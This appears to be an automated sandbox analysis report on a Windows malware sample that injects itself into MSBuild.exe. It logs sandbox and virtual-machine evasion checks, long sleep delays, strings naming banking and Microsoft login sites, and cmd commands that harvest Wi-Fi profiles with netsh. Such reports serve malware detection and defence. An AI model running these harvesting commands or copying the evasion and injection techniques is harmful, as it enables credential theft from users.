Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 7EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 8EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: 9070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: A070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: A3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory allocated: B3F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597331	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596976	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596421	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1898			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7953			Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe TID: 7992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe TID: 8036	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597331s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596976s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98331s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2952	Thread sleep time: -98207s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597331	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596976	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98331	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98207	Jump to behavior

Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2128978665.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: MSBuild.exe, 00000006.00000002.2626336920.00000000053DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL)>
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: MSBuild.exe, 00000006.00000002.2628361969.0000000005C66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: MSBuild.exe, 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Kh7W85ONS7.exe, 00000000.00000002.2119970961.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: tmpD1D1.tmp.dat.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 6_2_05AD0B20 LdrInitializeThunk,

6_2_05AD0B20

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CBC008	Jump to behavior

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
